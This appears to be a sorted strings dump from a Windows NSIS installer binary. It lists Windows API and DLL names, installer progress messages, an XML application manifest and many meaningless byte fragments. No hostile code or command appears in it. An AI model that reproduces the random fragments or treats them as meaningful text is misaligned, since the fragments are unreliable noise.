PostQuitMessage
PPPPPP
PRk4/}"C0O
.*	pUp
.,(=:Q
>Q04Xi*
Qg~tFx
q}#pH]
_qr1ET
qS-1;X*b
qSIZcP
 ?R0<qI
 ?R2>rI
 ?R2>sI
 ?R%3gI
 ?R3>sI
 ?R4?sI
 ?R*8iI
 ?R+8iI
?R9DzI
`.rdata
ReadFile
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
RegDeleteKeyExA
RegDeleteValueA
RegEnumKeyA
RegEnumValueA
RegisterClassA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
ReleaseDC
RemoveDirectoryA
[Rename]
reOCx8W
?R:EzI
?R=F|I
Ri{0&S,
RichEd20
RichEd32
RichEdit
RichEdit20A
 ?R,:lI
rrj+V3
^RWG.6_I\b
r_Z06f
 s495,7B
=S*AB??
ScreenToClient
SearchPathA
SelectObject
SendMessageA
SendMessageTimeoutA
SeShutdownPrivilege
SetBkColor
SetBkMode
SetClassLongA
SetClipboardData
SetCurrentDirectoryA
SetCursor
SetDlgItemTextA
SetEnvironmentVariableA
SetErrorMode
SetFileAttributesA
SetFilePointer
SetFileTime
SetForegroundWindow
SetTextColor
SetTimer
SetWindowLongA
SetWindowPos
SetWindowTextA
SHAutoComplete
SHBrowseForFolderA
SHELL32.dll
ShellExecuteA
SHFileOperationA
SHFOLDER
SHGetFileInfoA
SHGetFolderPathA
SHGetPathFromIDListA
SHGetSpecialFolderLocation
SHLWAPI
ShowWindow
s;~kNP\R
softuV
Software\Microsoft\Windows\CurrentVersion
S,p;^@
SP,^5Xw
+SP-zb
SQSSSPW
SystemParametersInfoA
=|t11"m3
!This program cannot be run in DOS mode.
tNScz3
_^[t	P
TrackPopupMenu
twa[)/
	U|_A|
UCVe|"
$U-EZEq
[UF3`9i
u+_lgsnC
unpacking data: %d%%
USER32.dll
%u.%u%s%s
V2O>p~
*;v39O
v\9B'K
V^%DCp 
verifying installer: %d%%
VerQueryValueA
VERSION.dll
	vet=U
#VhB+@
Vj%SSS
v&|{pL
VQH0C 
\VS0|d`
{v?UCL
w2e:^;
w9$ay\xCz$G
WaitForSingleObject
WD^l' 
-!wKuf
WriteFile
WritePrivateProfileStringA
wsprintfA
xJ|V"g
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="*" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v3.0b1</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/></application></compatibility></assembly>
(X ;Qee
x;TOE-
y'C$Rs
Y]iJ%}
)yiKC"
Y-%\z)
Z("~0U
Z~l6M<
Zq[xeoa
z.~Y5p